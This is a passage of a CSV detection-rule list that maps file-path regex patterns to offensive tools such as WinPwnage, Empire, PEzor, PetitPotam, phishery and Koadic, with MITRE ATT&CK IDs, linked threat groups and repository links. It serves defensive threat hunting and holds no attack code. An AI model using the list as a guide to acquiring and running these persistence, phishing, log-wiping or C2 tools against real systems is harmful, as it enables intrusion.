"*/persist_people.py*",".{0,1000}\/persist_people\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9621" "*/persist_schtask.py*",".{0,1000}\/persist_schtask\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9622" "*/persist_startup_files.py*",".{0,1000}\/persist_startup_files\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9623" "*/persist_userinit.py*",".{0,1000}\/persist_userinit\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9624" "*/persist_wmic.py*",".{0,1000}\/persist_wmic\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - 
T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","9625" "*/PersistBOF/*",".{0,1000}\/PersistBOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","9626" 
"*/Persistence.sh*",".{0,1000}\/Persistence\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","9627" "*/persistence/*.ps1",".{0,1000}\/persistence\/.{0,1000}\.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1133","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - 
MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","9628" "*/persistence/*.psm1",".{0,1000}\/persistence\/.{0,1000}\.psm1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1134","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","9629" "*/Persistence/InstallUtil.*",".{0,1000}\/Persistence\/InstallUtil\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","9630" "*/persistence_demos.git*",".{0,1000}\/persistence_demos\.git.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","1","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","9631" "*/persistence2.rc*",".{0,1000}\/persistence2\.rc.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","9632" "*/Persistence-Accessibility-Features.git*",".{0,1000}\/Persistence\-Accessibility\-Features\.git.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","9633" 
"*/PersistViaScheduledTask.ahk*",".{0,1000}\/PersistViaScheduledTask\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","9634" "*/persit_linux.go*",".{0,1000}\/persit_linux\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","#linux","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","9635" "*/persit_windows.go*",".{0,1000}\/persit_windows\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","9636" "*/peterspbr/dirty-pipe-otw*",".{0,1000}\/peterspbr\/dirty\-pipe\-otw.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/peterspbr/dirty-pipe-otw","1","1","N/A","N/A","N/A","1","1","0","2022-03-10T03:42:15Z","2022-03-09T17:21:17Z","9637" "*/PetitPotam.exe*",".{0,1000}\/PetitPotam\.exe.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - 
T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","9638" "*/PetitPotam.git*",".{0,1000}\/PetitPotam\.git.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","9639" "*/petitpotam.py*",".{0,1000}\/petitpotam\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9640" "*/PetitPotato.cpp*",".{0,1000}\/PetitPotato\.cpp.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","9641" "*/PetitPotato.git*",".{0,1000}\/PetitPotato\.git.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","9642" "*/PetitPotato-1.0.0.zip*",".{0,1000}\/PetitPotato\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via 
PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","9643" "*/PEzor.cna*",".{0,1000}\/PEzor\.cna.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","9644" "*/PEzor.git*",".{0,1000}\/PEzor\.git.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","9645" "*/PEzor.git*",".{0,1000}\/PEzor\.git.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","9646" "*/PEzor.py*",".{0,1000}\/PEzor\.py.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","9647" "*/PEzor.sh *",".{0,1000}\/PEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","9648" "*/PEzor/inject.cpp*",".{0,1000}\/PEzor\/inject\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","9649" "*/pfsense_clickjacking*",".{0,1000}\/pfsense_clickjacking.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9650" "*/pgsql-brute.nse*",".{0,1000}\/pgsql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9657" "*/Phant0m.git*",".{0,1000}\/Phant0m\.git.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","9658" "*/phant0m-exe*",".{0,1000}\/phant0m\-exe.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","N/A","10","1781","301","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z","9659" "*/PhishCreds.ps1*",".{0,1000}\/PhishCreds\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - 
T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","9660" "*/phishery.exe*",".{0,1000}\/phishery\.exe.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","9661" "*/phishery.git*",".{0,1000}\/phishery\.git.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","9662" "*/phishery/releases/download/*",".{0,1000}\/phishery\/releases\/download\/.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. 
Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","1","N/A","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","9663" "*/phishing.py*",".{0,1000}\/phishing\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","9664" "*/Phishing.sh*",".{0,1000}\/Phishing\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","9665" "*/phishing/*.html*",".{0,1000}\/phishing\/.{0,1000}\.html.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","9666" "*/phishing/password_box*",".{0,1000}\/phishing\/password_box.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. 
JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","9667" "*/phishing-HTML-linter.py*",".{0,1000}\/phishing\-HTML\-linter\.py.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 